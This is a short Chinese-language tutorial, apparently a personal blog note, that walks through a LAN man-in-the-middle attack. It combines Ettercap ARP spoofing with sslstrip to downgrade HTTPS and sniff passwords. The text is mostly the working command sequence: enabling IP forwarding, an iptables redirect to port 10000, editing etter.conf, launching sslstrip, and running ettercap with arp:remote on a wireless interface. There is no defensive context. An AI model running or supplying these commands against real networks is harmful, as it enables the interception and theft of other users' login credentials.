Ettercap是一个非常强大的嗅探欺骗工具;在以往的ettercap的使用过程中,我们大多用来嗅探http,ftp,和一些加密比较简单的邮箱等的密码,对于新型的ssl/https等的加密协议就显得不是太完美;这里我们使用一款专门针对ssl/https加密协议的工具配合Ettercap进行局域网嗅探欺骗:sslstrip。
以下方法均来自互联网,这里只是记录一下笔者自己使用过程!
1.开启转发:
echo "1">/proc/sys/net/ipv4/ip_forward
2.iptables过滤数据包
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
还有一种方式:修改/etc/ettercap/etter.conf
去掉# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
的两个注释即可
3.监听转发端口
sslstrip -l 10000
4.arp嗅探
ettercap -T -q -i wlan0 -M arp:remote // //
视频:
清晰版下载地址:http://pan.baidu.com/s/1qWJbFrA